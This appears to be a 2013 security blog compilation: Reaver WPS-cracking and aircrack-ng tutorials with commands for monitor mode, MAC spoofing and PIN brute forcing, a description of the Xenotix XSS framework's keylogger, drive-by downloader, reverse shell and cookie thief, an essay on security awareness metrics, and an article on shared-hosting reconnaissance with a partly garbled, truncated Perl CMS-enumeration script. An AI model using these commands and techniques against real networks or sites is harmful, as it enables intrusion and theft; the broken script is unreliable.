Thứ Bảy, 27 tháng 4, 2013

Reaver WPS Hacking Tutorial Explained

Prerequisites
You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.
Basic Usage
First, make sure your wireless card is in monitor mode:# airmon-ng start wlan0
To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually ‘mon0′, not ‘wlan0′, although this will vary based on your wireless card/drivers):# reaver -i mon0 -b 00:01:02:03:04:05
You will probably also want to use -vv to get verbose info about Reaver’s progress:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding ‘-d 0′ on the command line, but some APs may not like it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another option that can speed up an attack is –dh-small. This option instructs Reaver to use small diffie-hellman secret numbers in order to reduce the computational load on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv –dh-small
MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver supports MAC spoofing with the –mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card’s physical interface. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv –mac=00:BA:AD:BE:EF:69
Default Pins
It has been reported that some models/vendors/ISPs all come configured with a default pin. Common pins are 12345670, 00005678, 01230000, etc. Reaver attempts known default pins first.
Errors and Warnings
It is not uncommon to get a few errors or warnings during the attack, usually related to receive timeouts or out of order WPS messages. You may even get these warnings for a few minutes until the pin count starts incrementing again.
However, if your pin count does not increment at all, or increments only occasionally with lots of errors/warnings, answer the following:
Does the target AP support WPS and is WPS enabled?
Did you put your wireless card into monitor mode?
Did you specify the monitor mode interface with the -i option?
Do you have a good signal from the AP?
If you still have problems, you can see if your problem is already listed in the project issue tracker. If not, create a new issue, and be sure to include:
Linux distro, distro version, and architecture (32 bit or 64bit?)
Wireless card and driver
Pcap file demonstrating the issue, if possible

Airodump-ng Explained in Detail.

Airodump-ng Usage
Airodump-ng has the following usage:
airodump-ng <options><interface name>
Airodump-ng has many different options and we will be covering aa great many of them through this tutorial. Some of the most common options are:



Prior to running Airodump-ng, your wireless card needs to be in monitor mode. Then, to run a basic sniffing session, the only parameter that neesd to be passed is the wireless interface name.
airodump-ng <inteface name>
Once Airodump-ng is launched, you will see somthing similar to this:

This may be confusing  but it is really easy to understand.
Airodump-ng breakdown:
As you have seen, Airodump-ng presents a wealth of information while it is running its
capture. The top line of the display, beginning at the left, shows the current channel,
followed by the elapsed sniffing time, the current date and time, and interestingly, an
indication that a WPA handshake was captured. The significance of this will be covered
later but what this means is that a 4-way WPA handshake was captured for the access point
with the BSSID of C8:BC:C8:FE:D9:65.
The Airodump output is separated into 2 separate sections. The top portion provides
information about the access points that have been detected along with the encryption in
use, network names, etc.
In the lower portion of the output, the BSSID column contains the MAC addresses of the
detected access points with the STATION column containing the MAC addresses of the
connected clients.
The table below contains descriptions of all of the Airodump fields.



If you are in an area with many other access points, your Airodump display and capture
files will become very cluttered with unwanted data. After doing your initial
reconnaissance, you can determine the BSSID of the access point and the channel it’s
transmitting on and zero in on it specifically.
To sniff the data of an AP on channel 3 with the BSSID of 34:08:04:09:3D:38, you would
first place your card in monitor mode on channel 3.



Now, you can launch Airodump-ng with some advanced filtering options to sniff only the
traffic for the AP you are interested in by using the following syntax:
airodump-ng -c <Channel> –bssid <BSSID> -w <Capture><interface name>


As can be seen in the above Airodump output, filtering for a specific access point can make
for a much more manageable display and will keep your capture files to a reasonable size.
To further minimize the disk space used by the file capture, you can also include the ‘–
ivs’ option.
airodump-ng -c <Channel> –bssid <BSSID> -w <Capture> –ivs <interface name>
This flag stores only the weak initialization vectors and not the full packet. An important
point to keep in mind is that the ‘–ivs’ flag should NOT be used if you are attempting to
capture a WPA/WPA2 handshake or if you want to use the PTW attack against WEP.
No APs or Clients are Shown
• If you have a laptop with a built-in wireless card, ensure it is enabled in the BIOS.
• Make sure your card works in managed mode.
• Try unloading the driver with rmmod and reloading it with modprobe.
Little or No Data Being Captured
• Ensure that you have used the -c or –channel option to specify a single channel.
Otherwise, Airodump-ng will hop between the different channels.
• You might need to be physically closer to the AP to get a good quality signal.
• Ensure that you have started your wireless card in monitor mode with Airmon-ng.
• If you are using a Madwifi-ng driver, make sure that there are no other VAPs
running. There can be issues when creating a new VAP in monitor mode if there is an existing VAP in managed mode.

Aireplay-ng Explained in detail

Aireplay-ng is primarily used to generate or accelerate wireless traffic for the later use with
Aircrack-ng to crack WEP and WPA-PSK keys.
Aireplay-ng supports various attacks such as
deauthentication (for the purpose of capturing the 4-way WPA handshake), fake
authentication, interactive packet replay, and more.
Aireplay-ng supports the following attacks along with their
corresponding numbers:

This section provides a general usage overview as not all options apply to all attacks. See
the command options of the specific attack you wish to use for the relevant details.
aireplay-ng <options><interface name>
For all attacks, with the exception of deauthentication and fake authentication, you may use
the following filters to limit the packets that will be used in the attack. The most commonly
used filter option is ‘-b’ to single out a specific AP.

When replaying (injecting) packets, the following options apply. Bear in mind that not
every option is relevant for every attack. The specific attack documentation provides
examples of the relevant options.

The Aireplay-ng attacks can obtain packets from two sources. The first source is a live flow
of packets from your wireless card whereas the second source is from a pre-captured pcap
file. The standard pcap format (http://www.tcpdump.org) is recognized by most
commercial and open-source traffic capture and analysis tools. Reading from a file is an
often-overlooked feature of Aireplay-ng.

The following attack modes are specified with the following switches. Numbers can be used
instead of the attack names.


The following troubleshooting tips apply to all modes of Aireplay-ng.
Aireplay-ng does not Inject Packets
Ensure that you are using the correct monitor mode interface. Running ‘iwconfig’ will
show the wireless interfaces and their states. For devices using mac80211 drivers, the
monitor mode interface is typically named mon0. For users of madwifi-ng drivers, ensure
that there are no other VAPs running.
Aireplay-ng Hangs with No Output
If you enter the command and it appears to hang with no output, this is typically due to
your wireless card being on a different channel number than the access point.
Also, if you have another instance of Aireplay-ng running in background mode, this can
cause the second command to hang if the options conflict.
Aireplay-ng “write failed: Cannot allocate memory wi_write(): illegal seek”
When using a wireless card with a Broadcom chipset, you may encounter this bug found in
the original bcm43xx patch. You can try using the b43 driver instead of bcm43xx.
Aireplay-ng has Slow Injection “rtc: lost some interrupts at 1024Hz”
If you see that you are injecting packets successfully but very slowly, at around 30 packets
per second, and receive the kernel message “rtc: lost some interrupts at 1024Hz”, there is
no fix other than to start another instance of Aireplay, which should increase the injection
rate.

Injection Test Usage
The injection test has the following usage:
aireplay-ng -9 -e <ESSID> -a <AP MAC> -i <interface><interface name>
Where:
• -9: injection test
• -e: optional ESSID (network name)
• -a: optional AP MAC address
• -i: optional interface name for the two card injection test
• <interface name>: the interface name to use for the test
Important: You must set your card to the desired channel with Airmon-ng prior to running
any of the tests.
The basic injection test determines if your card successfully supports injection. As
mentioned earlier, the wireless card must first be in monitor mode:

Next, the basic injection test is launched using the following syntax:
aireplay-ng -9 <interface name>

Injection Test Results Analysis
• 12:02:10 Injection is working!:
This confirms that the wireless card can inject
• 12:02:11 Found 2 APs:
These APs were found either through the broadcast probes
or received beacons
12:02:12 34:08:04:09:3D:38 – channel: 3 – ‘em3rgency’: The first AP being tested
12:02:13 Ping (min/avg/max): 1.455ms/4.163ms/12.006ms Power: -37.63: the ping times are calculated
12:02:13 30/30: 100%: The pings had a 100% success rate for the AP
12:02:13 C8:BC:C8:FE:D9:65 – channel: 2 – ‘secnet’: Notice that this AP is on channel 2.

Thứ Sáu, 26 tháng 4, 2013

OWASP Xenotix XSS Exploit Framework v3 2013

OWASP Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications. It is basically a payload list based XSS Scanner and XSS Exploitation kit. The exploitation framework will help the penetration testers to create proof of concept attacks on vulnerable web applications.
 

Project Leader(s): Ajin Abraham
Download : https://www.owasp.org/image/3/3d/OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip

Introduction
Cross Site Scripting or XSS vulnerabilities have been reported and exploited since 1990s. XSS got listed as the top 3rd Vulnerability in the OWASP 2013 Web application Vulnerabilities list. Cross-site scripting (XSS) is a type of security vulnerability typically found in web applications which allows the attackers to inject client-side script into web pages viewed by other users. The execution of the injected code takes place at client side. A cross site scripting vulnerability can be used by the attacker to bypass the Same Origin Policy (SOP). In the past, the potentials of XSS vulnerability were not known. XSS was mainly used for stealing cookies and for temporary or permanent defacements and was not considered as high risk vulnerability. But later XSS tunneling and Payload delivering showed us the potential of XSS Vulnerability. Most of the large websites like Google, Facebook, Twitter, Microsoft, and Amazon etc. even now suffers from XSS bugs. That’s a brief introduction about XSS. 
Some threats due to XSS
XSS Tunneling: With XSS Tunnel a hacker will obtain the traffic between the victim and a webserver.
Client side code injection: A hacker can inject malicious codes and execute them at client side.
DOS: A hacker can perform DOS against a remote server or against the client itself.
Cookie Stealing: A hacker can obtain the session cookies or tokens of a victim.
Malware Spreading: A hacker can spread malwares with a website which is vulnerable to XSS.
Phishing: A hacker can embed or redirect to a fake page of the website to get the login credentials of the victim.
Defacing: Temporary or permanent defacement of web application is possible.

What is Xenotix XSS Exploit Framework?
Xenotix XSS Exploit Framework is a penetration testing tool to detect and exploit XSS vulnerabilities in Web Applications.This tool can inject codes into a webpage which are vulnerable to XSS.It is basically a payload list based XSS Scanner and XSS Exploitation kit. It provides a penetration tester the ability to test all the XSS payloads available in the payload list against a web application to test for XSS vulnerabilities. The tool supports both manual mode and automated time sharing based test modes. The exploitation framework in the tool includes a XSS encoder, a victim side XSS keystroke logger, an Executable Drive-by downloader, a XSS Reverse Shell and a XSS DDoSer. These exploitation tools will help the penetration tester to create proof of concept attacks on vulnerable web applications during the creation of a penetration test report.
Features of Xenotix XSS Exploit Framework
Xenotix XSS Exploit Framework is divided into two module

 Scanner Module
  • Built in XSS Payloads
  • HTML5 compactable Payload list
  • XSS Auto mode Scanner
  • XSS Multi-Parameter Scanner
  • XSS Fuzzer
Exploitation Framework
  • XSS Keylogger
  • XSS Executable Drive-by downloader
  • XSS Payload Encoder
  • XSS Reverse Shell
  • XSS DDoSer
  • XSS Cookie Thief
Scanner Module

Built in Payload List
It is having an inbuilt XSS payload list of above 500+ XSS payloads. It includes HTML5 compactable XSS injection payloads.Most of the XSS filters are implemented using String Replace filter, htmlentities filter and htmlspecialcharacters filter. Most of these weakly designed filters can be bypassed by specific XSS payloads present in the inbuilt payload list.
The above chart shows the number of XSS Payloads in different XSS Scanning tools available in market. Xenotix XSS Exploit Framework got the world’s second largest XSS Payload list after IBM AppScan Security which is having 700 million payloads.
XSS Scanner Module

XSS Multi-Parameter Scanner


The Multi-Parameter XSS Scanner comes when you have multiple parameters to test for XSS. It can extract the different parameters from the given URL and test them individually. It saves a lot of your time as you don’t need to test each parameter separately.
XSS Fuzzer


The XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With the Fuzzer, one can conduct an out of the box testing of the box fuzzing to detect hidden vulnerabilities in a web application.

2. Exploitation Framework
XSS KeyloggerThe XSS Fuzzer is a convenient module to detect hidden XSS as well as other vulnerabilities like HTTP Parameter Polution. With the Fuzzer, one can conduct an out of the box testing of the box fuzzing to detect hidden vulnerabilities in a web application. 
The tool includes an inbuilt victim side Key logger which is implemented using JavaScript and PHP.  PHP is served with the help of a portable PHP server named QuickPHP by Zach Saw. A JavaScript file is injected into the web application vulnerable to XSS and is presented to the victim. The script captures the keystrokes made by the victim and send to a PHP file which further write down the logs into a text file.
XSS Executable Drive-by Downloader

Java Drive-by download can be implemented with Xenotix XSS Exploit Framework. It allows the attacker to download and run a malicious executable file on the victim’s system without his knowledge and permission. 
You have to specify the URL for the malicious executable and then embed the drive-by implemented webpage into a XSS vulnerable page and serve your victim. When the victim view the injected page, the java applet client.jar will access the command prompt and with the help of echo command, write down some scripts to a Visual basic script file named winconfig.vbs in the temp directory(%temp%) and then the cmd.exe will start winconfig.vbs. The winconfig.vbs will download the malicious executable specified by you in the URL to temp directory and rename it as update.exe and finally it will execute update.exe. The downloading and executing of the malicious executable happened without the knowledge and permission of the victim.
XSS Payload Encoder
The inbuilt Encoder will allow encoding into different forms to bypass various filters and Web Application Firewalls. The encoder supports Base64 Encoding, URL Encoding, HEX Encoding, HTML Characters Conversion, Character Code Conversion and IP to Dword, Hex and Octal conversions.
XSS Reverse Shell
A XSS Reverse Shell can be implemented with Xenotix XSS Exploit Framework. This is made possible with the help of Java Drive-By. The XSS vulnerable web application exploited with the injectable scripts generated by XSS Reverse Shell when presented to a victim will initiate the drive by download of a Reverse TCP connecting shell. After the drive-by download, the reverse shell is executed by the same method used in Java Drive-by.
The advantage of this method is that the reverse shell is downloaded and executed in the victim’s system without his knowledge. But for the execution of reverse shell, it will pop up a UAC dialog requesting for the permission to run the executable. The tool is having an inbuilt Listener that listens to the reverse shell. It is designed in a user friendly manner. All you have to do is to specify the reverse connection IP and port. 
XSS DDoSer


With HTML 5 comes great power. We harvest the power of HTML 5 to abuse the Cross Origin Resource Sharing (CORS) and WebSocket to implement a DDoS attack.  
WebSocket is a technology that allows web applications to have a bidirectional channel to a URI endpoint. Sockets can send and receive data to and from a web server and respond to opening or closing a WebSocket. The XMLHttpRequest is a JavaScript object which is used to exchange data between a server and a bowser behind the scene. This can be used for Cross Origin Resource Sharing (CORS). We can perform a combined and powerful DDoS attack by abusing these two technologies. This module abuses WebSocket and creates numerous socket connections with a target server to slow it down. Along with it by abusing CORS, the add-on create numerous fake GET requests to slow down the target server. When we send the first request to the target server and the response contains the 'Access-Control-Allow-Origin' header with a value that restricts cross site requests, then at times the browser refuses to send more requests to the same URL. However this can be easily bypassed by making every request unique by adding a non-existing query-string parameter with changing values.
XSS Cookie Thief


It’s the traditional Cookie Stealer but a bit advanced and with real time cookie viewer. This module allows the pentester to create cookie stealing POC.
Features for the Next Build
Current version of XSS Exploit Framework is based on Internet Explorer’s webpage rendering engine Trident. Since XSS got slightly different behavior in different Web Browsers, the support for the Gecko (Used by Mozilla Firefox) and Webkit (used by Chrome, Opera, and Safari) Rendering engines will be added up in the next build. The support for XSS in POST Parameter and XSS testing by modifying the headers will be included in the next build. XSS Proxy to tunnel the victim-server traffic will be added in future builds. Automatic detection of parameters or variables vulnerable against XSS and DOM Based XSS detection will be added up in next build.
Conclusion
XSS in popular website is a high security threat. Xenotix XSS Exploit Framework can be used by Security Analysts to perform penetration test on Web Applications against XSS vulnerability and to create POC with the inbuilt exploitation framework. Most of the security tools related to XSS are either XSS Scanners or XSS Exploitation tools. Xenotix XSS Exploitation Framework is the first of its kind to act both as an XSS vulnerability scanner as well as XSS exploitation framework. Bug bounty programs like Google Vulnerability Reward Program, Facebook Bounty, Paypal bug bountyetc. are there. So go for a XSS hunting and grab your bounty.J
About Author
Ajin Abraham is an Information Security Researcher. He is the creator of OWASP Xenotix XSS Exploit Framework. He had published different whitepapers and tools in the scope of Information Security. He is one among the top 10 in Chakravyuh 2012, India’s Biggest Ethical Hacking Competition. His area of interest includes web application penetration testing, coding tools, exploit development and fuzzing. He has been a speaker at many security conferences including Defcon Bangalore-India 2012, ClubHack 2012, nullcon Goa 2013, AppSec APAC 2013, Hack Miami 2013, BlackHat Europe 2013 and many more.

Thứ Năm, 25 tháng 4, 2013

Security Awareness – Judge the Impact to Justify the Effort

Security awareness is a top priority for most security officers. But, making it measurable for business analysis can be hard work. In this piece, I want to consider how to ensure anyone responsible for these programs can measure their success. To convince doubters that they are needed, budget managers that they are worth it and security auditors that they are effective.
I’m writing this series of articles as former security officer in the British Civil Service. If you’ve read some of my other articles, I hope I’ve convinced you there has been a universal leveling off of security practices, and that the lessons learnt from the world of government can be applied to the smallest business (and the other way around, too).
This was not always so. In the case of security education (as we call it now), things have changed a lot over the past few decades. When I joined the civil service in the late 1970s, the threats were very different, as were the means of warning people about them. In that age, security (with hindsight at least) was much easier to define. In physical terms, the menace to the UK government was mainly from guerilla groups, like the Irish Republican Army and Black September. In terms of documentary assets (there being few computers around) the threat was mostly from the Soviet Union, its allies and some home based groups that overtly or covertly supported Soviet ideology.
The means of delivering the security messages about these threats was a talk to all new entrants by someone from the security department. This man – it was always a man – could be good at instilling feelings of dread in freshmen about the consequences of non-compliance. The occasional circulation of a staff security handbook with detachable pages (to facilitate amendments) would follow this up.
Though very unsophisticated and horribly dated, the effect of all this was quite profound on this school leaver. That I was actually pitted against the Red Army and shadowy urban guerillas gave a sort of thrill to my impressionable mind, though the less questioning attitudes to authority of that time probably made security manager’s tutorials an easier ride.
Measuring the effectiveness of security education was not a factor then. I believe that were any metrics to have been applied, they would have been expressed very simply in terms of the absence of terrorist attacks and successful (and known) espionage exploits.
I’ve written elsewhere about establishing an effective method of security awareness, but since we live in a more questioning age, I don’t think it is sufficient to simply get on with a program of education. Management and budget holders have to be convinced, not only that this is necessary but also that what is done is effective and provides good value.
I believe the British Civil Service now recognizes this. In 2008, they introduced an ‘Information Assurance Maturity Model’ (IAMM) that requires government offices to annually demonstrate improvements to the effectiveness of their IA security measures. This partly came about as a result of the big news headline loss of personal data in 2007, though it is within the growing (and I think welcome) tide of demonstrable accountability and improvement to which British public services must now submit. The 1970s approach can still be glimpsed in TV Brit Com reruns.
One of the requirements of the IAMM covers information security training and awareness. For the first time, government offices have to assess their progress with this and improvements to it, in formats that will be available via the UK Parliament to the public record. That is not the exclusive reporting line either: most government offices are also liable to direct public questioning through Freedom of Information legislation).
We have come a long way from a handbook of security rules that staff were expected to be too scared to break. But how can we report on the effectiveness of any education, especially when as a security officer you probably are not primarily an educationalist and have other things to do?
Measuring the successful perception of a subject is something that can keeps educationalists – and advertising executives – exercised for ages. Though technology and desktop systems are there to help us with our metrics, there is a temptation to just apply expensive turnkey software, which beams security awareness at staff. This sort of software will require them to respond to their learning with, typically, a multiple choice set of questions. It will then compile statistics about the range of responses which management can analyze.
These sorts of packages have been available for some time. I have always been skeptical of them. They are often written in a style that is alien to your office and which may not have a sympathetic grasp of the threats that your customers face. Inevitably, they lack any feel for the office chain of command, which is particularly difficult to generalize. The British government has tried hard to create job roles for those with security responsibilities within its departments, but the independent-mindedness of these institutions makes that difficult. I have also found these packages tend to concentrate on generalities like password construction and to include unnecessary theorizing about ‘confidentiality, integrity and availability’. This is the language of information security specialists, not staff who handle everyday corporate data. In one case, the choice of graphics was rather off-putting, too resembling a childish looking game of ‘crazy golf’. This did not underpin a serious message and could have exposed the security office to ridicule had it been adopted.
Another security education favorite I looked upon skeptically was the inclusion of gimmicks in awareness drives, such as pens and coasters. My own doubts on this aside, it is probably indisputable that the effectiveness of these novelties cannot be measured. They might prompt staff to think about a message but cannot teach them ways of doing things or be made accountable statements of security policy. I think you will tell me if I am overlooking how an ‘advertising’ style e security awareness campaign might change behavior, but my experience is that the enthusiasm in producing gimmicks is never proportionate to the response from their target audience.
So what measurements can we apply to an education program that will not also require buying in expensive and possibly ill-fitting turnkey products? How can the measurements themselves help improve the product?
Sometimes security officers have no choice but to put maximum publicity to an event that is a clear and present threat to their organization’s security. These efforts can be time consuming without being measurable. But I think it is sometimes necessary just to show a management board and CEO that steps are being taken to tell staff about such threats. However, the effort put in to designing an ongoing security education program should be a regular undertaking, with messages prioritized by the current threats to the organization. This assumes that all threats are captured from top to bottom of the organization, regularly managed and plainly visible to the security officer.
This is the ideal. The reality is a mixture of regular security features to be produced in a digestible and busy-reader sort of way, alongside the occasional one-off response to a threat.
In both cases, my view is that the messages really do need to be crafted by an organization’s own security officers, if not entirely from scratch then with help from a network of contacts and mentors who have the same objectives. This ensures messages are made relevant to staff and do not become just an echo- chamber for the sorts of security headlines that we see almost every day in the national news. This also helps to ensure that the messages, which staff do receive, are relevant to the threats the organization is most concerned about. That should also help to highlight the valuable work of your security team, an important consideration when times are lean and cuts in programs are sought.
The canvas upon which we can present security education is really very wide. Though skeptical of turnkey security education products, I am all for the use of desktop networks to present the materials. Some organizations will already have the skills needed for the presentation and recording of results of questionnaires associated with the material. That said, I would be cautious about relying on online returns alone to present a picture of the organization’s security readiness. Staff will exchange the ‘right’ answers around the water-cooler, while many will find the right excuses not to complete any online quizzing on time (or at all). Better, I think to agree with the company auditors or equivalent upon a minimum number of responses to draw your conclusions about the effectiveness of security knowledge. There should be no expectation of a 100% return upon which to base this. I have always found that a close alliance with qualified auditors can help security officers here. Auditors are often called to assess the objectivity of evidence. They should be able to provide a professional view on what constitutes a sufficient quorum of staff to satisfy managers that a selected slicing is representative of the whole organization.
Another, more effective assessment requires a little more time to set up and relies on soft skills, which are not always associated with security officer roles. This can be through a focus group approach, either within a Town Hall meeting style of arrangement or to a smaller group of selected staff. Here, the security officer can direct a line of questioning to cover specific concerns – including specific threats – as a way of getting a fair sounding on how awareness programs are hitting the mark. It also gives some useful first-hand feedback as to what might be changed to improve future content. Again, the numbers of staff being questioned and the timing of these questioning sessions can be varied depending upon an organization’s requirements.
This approach can be considered alone or alongside the more number-crunching methodologies available through a questionnaire. Time is of course valuable and many security staff might be drawn towards a hands-off approach to education and awareness materials. There is however, a risk that security will then seem rather remote. A big advantage of conducting regular meetings with selected groups of staff is that it humanizes the subject, allows an exchange of views and ensures that lines of security reporting are collaborative and are not associated with alarm or failure.
Finally, it is necessary to present some convincing – but not overpowering – metrics that will convince senior managers that they can worry less (I said in an earlier piece that one of the most effective roles that can be played by a security officer is to reassure their own managers that everything is under control). I caution against too much work being put into analytical reports. I have been quite confused by some of the more colorful charts and graphical representations so I’m sure senior managers will have been too (though they are not always very quick to admit this). Obvious elements of such metrics might be the numbers of staff who have received a security briefing within, say , a twelve month period and the numbers and types of breaches of security that are attributable to oversight or (much rarer in my experience) deliberate and malicious actions. This is important: no general security education will be enough to prevent human error or catastrophic and unseen events. The metrics will only really take flight when fixed periods can be compared (but ensure the presentation does not get too static either, since the categorization of some incidents may change as technology evolves). Therefore, start plotting data on security incidents against throughput of your security awareness and training programs ensure these programs are changed in response to changes of threats and ensure that there is effective and adequate feedback from staff about their understanding.


About the Author
John G. Laskey is a US-based security consultant (http://url.ie/h0h2 ) who has worked in the British government equivalents of DoJ and FEMA. He was responsible for the security risk management of a number of systems developed to increase government and public security. Recently, He has advised senior UK government managers on the health of major projects and programs and helped develop a new certification scheme for consultants seeking British government contracts. John is a member of ISSA (Connecticut Chapter) and BCS – the Chartered Institute for IT.

Risks on a Shared Hosting Server

PREFACE

In this article, I would like to present the risks associated with hosting your site on a shared hosting server. I often correlate it with the analogy, “a chain is only as strong as its weakest link”. In a similar way, if your site is hosted on a shared hosting server, it is only as secure as the site with the weakest security on the same server.
Web Administrators often face the unfortunate situation where even after hardening their site, patching all the security loopholes, running the latest version of the software and plugins, their site is compromised or defaced.
The intended audience for this article ranges from server Administrators, Site Administrators to Security Enthusiasts and Professionals.
INTRODUCTION

While there are many ways of hacking a site, the hackers tend to use the easiest path before going for advanced attacks.
By understanding these methods used by the attackers, it allows us to prevent many possibilities of attack against the server.
From a performance point of view on a shared hosting server, the server’s resources (processor and memory) are shared with other sites hosted on the same server. While this may not be a bottleneck for most of the site owners, there are other risks associated with a shared hosting server from a security standpoint that can never be overlooked irrespective of the purpose of your site.
Let us look at some of the reasons your site is not so secure on a shared hosting server:
  1. If any one site on the server is compromised, it literally opens a gateway for the attacker to gain access to the other sites hosted on the same server as well.
  2. A malicious user can buy the hosting from a shared hosting Provider and use his site to gain access to other sites on the same server.
  3. There is also the disadvantage of not being able to harden the server. If you are on a shared hosting server, you would not have access to the PHP and Apache configuration of the server.
By exploring the different phases of attack used to compromise a site and a server thereafter, we can understand the risks associated with having your site run on a shared hosting server.
The best way to benefit from this article and use it to secure your site and hosting is by giving a thought about how you can mitigate each step used by the attacker.
Reverse IP Lookup

This is one of the most important stages of the attack, also known as Reconnaissance. Since the attacker is targeting a site on a shared hosting, the most important step becomes to enumerate the list of other websites running on the same server.
This can be done easily with the help of Reverse IP lookup.
A reverse IP lookup can help in quick and easy discovery of various other sites running on the same server as your own site.
It can be done in various ways.
  1. Using a Free Service to get this List: There are some sites online that maintain a database that maps an IP Address to various websites that run on the server with this IP Address.
    Please note that the results of these sites may not be accurate and in some cases, they show incorrect results.
    http://www.yougetsignal.com/tools/web-sites-on-web-server/
    This is a good site to perform a quick reverse IP lookup. It will even highlight the sites with questionable content in red. Usually, these are also the sites that lack the security and are often easy targets for an attacker.
  2. Using dig on Linux.
    Dig command can be used to perform a reverse IP lookup in this way:
    Dig –x <ip address> +short
    An example:
    c0d3inj3ct@:~/pentest/$ dig -x 74.125.236.51 +short
    www.google.com.
    This functionality provided by dig command can be extended not to grab the hostnames associated with all the IP Addresses in a subnet.
    Here is a short shell script written which will accept an IP Address as an argument and then list out all the hostnames associated with the IP Addresses in that subnet:
    #!/bin/bash
    NET=$1
    for n in $(seq 1 254); do
    ADDR=${NET}.${n}
    echo -e “${ADDR}\t$(dig -x ${ADDR} +short)”
    done
    chmod +x subnetscan.sh
    ./subnetscan.sh <IP Address>
  3. Using a Search Engine to get the list.
    This is another quick and easy way to get the list of sites running on the same server. Search Engines like bing.com give very accurate results.
    Search Query: ip: <IP Address>
  4. Automating the Reverse IP lookup using a Perl Script.
    It can also be automated using Perl by writing a script which will accept a site name as an argument, and use its IP Address to get the list of all the sites running on the same server. I will provide the script later in this article that I have written to perform the Reverse IP lookup and later discover all the CMS running on the same server.
    The Reverse IP Lookup stage is also one of the most interesting phases since it can really open your eyes when you discover the kind of sites running on your server. This may also be important for you from an SEO point of view since if the sites running on your server have a bad reputation, chances are you would not get a good search rank.
Enumerating CMS running on the server

CMS are content management systems running on the sites that make it easy for the web administrator to host and manage their content.
CMS seems to be one of the easiest ways to break into a server. So, a list of sites running a CMS is made. The reason this is so easy to do is because all CMS software inserts their name and version details in the HTML Page in Meta tag’s content attribute with the name attribute set to generator.
Using a passive scan, we can grab the CMS Type and Version number details from the source code of the site.
Examples of Meta tags of some WordPress and Joomla Sites:
<meta name=”generator” content=”WordPress 3.5.1″ />

<meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />
As can be seen, it becomes very easy to know the CMS Type and Version number just by looking up the Source code.
Now, we can combine the Reverse IP Lookup with Enumerating the CMS running on the server. I have written a Perl script that accepts an IP Address as an argument. It will perform a Reverse IP lookup; generate the list of all the sites running CMS and the corresponding CMS Type.
Please note that this script can be extended to gather information for more types of CMS. You just need to inspect the Source Code for various CMS and see what type of information they insert in the Meta tags.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
#! /usr/bin/perl
use warnings;
use WWW::Mechanize;
use HTML::TreeBuilder::XPath;
use LWP::UserAgent;
use HTTP::Request;
use Crypt::SSLeay;
use JSON qw{decode_json};
use Net::DNS;
no warnings 'uninitialized';
no warnings 'once';
print "\n################### CMS Finder #########################\n";
print "################## - c0d3inj3cT - ######################\n\n";
print "Enter the IP Address of the Serverserver: ";
$server_ip=;
chomp $server_ip;
print "Enter the output file name: ";
$output=;
chomp $output;
open(OUTPUT,'>>',$output) || die("Couldn't open the file, $output with error: $!\n");
$query          = "ip:".$server_ip;
$account_key    = '';
$url            = URI->new('https://api.datamarket.azure.com/Bing/SearchWeb/Web');
$ua             = LWP::UserAgent->new;
$page_count     = 0;
$interval       = 50;
while(1)
{
$skip=$page_count * $interval;
$url->query_form(
        'Query'   => qq{'$query'},
        '$top'    => $interval,
        '$skip'   => $skip,
        '$format' => 'json',
    );
last if($page_count == 9);
$req = HTTP::Request->new(GET => $url);
$req->authorization_basic('', $account_key);
$res = $ua->request($req);
die $res->status_line if !$res->is_success;
$json = decode_json $res->content;
last if !defined $json->{d}->{results};
foreach $result (@{$json->{d}->{results}})
{
    $domain=$result->{DisplayUrl};
    $domain=~s/(.*?)\/.*/$1/;
    $check=&resolve($domain);
    if($check==1)
    {
        push(@hosts,$domain);
    }
}
++$page_count;
}
@unique = grep { ! $seen{$_}++ } @hosts;
$count=scalar @unique;
print "\nApproximately ".$count." hosts found on the server\n\n";
$mech=WWW::Mechanize->new();
$mech->max_redirect(0);
print OUTPUT <<HTML;
CMS Finder!</pre>
HTMLprint "\n\nChecking for CMS Panels on the Sites\n\n";foreach $host (@unique){ chomp $host; $url="http://".$host; eval{$mech->get($url);}; next if($@); $response=$mech->content(); $tree=HTML::TreeBuilder::XPath->new(); $tree->parse($response); @nodes=$tree->findnodes(q{//meta[@name=~/generator/}); $c=0; foreach $node (@nodes) { $c++; $name=$node->attr('content'); if($name =~ /Joomla/) { ($cms,$version,$rest)=split(" ",$name,3); print OUTPUT " \n"; } elsif($name =~ /Word/) { ($cms,$version)=split(" ",$name); print OUTPUT " \n"; push(@wordpress,$url); } last if($c==1); }}print OUTPUT "
<table border="1" cellspacing="1" align="center">
<tbody>
<tr>
<td><b>Site</b></td>
<td><b>CMS</b></td>
<td><b>Version</b></td>
</tr>
<tr>
<td>".$url."</td>
<td>".$cms."</td>
<td>".$version."</td>
</tr>
<tr>
<td>".$url."</td>
<td>".$cms."</td>
<td>".$version."</td>
</tr>
</tbody>
</table>
<pre>";
sub resolve()
{
    $site=$_[0];
    $resolver = Net::DNS::Resolver->new();
    $queryresponse = $resolver->send($site, "A");
    @rr = grep { $_->type eq "A" } $queryresponse->answer;
    $num=scalar @rr;
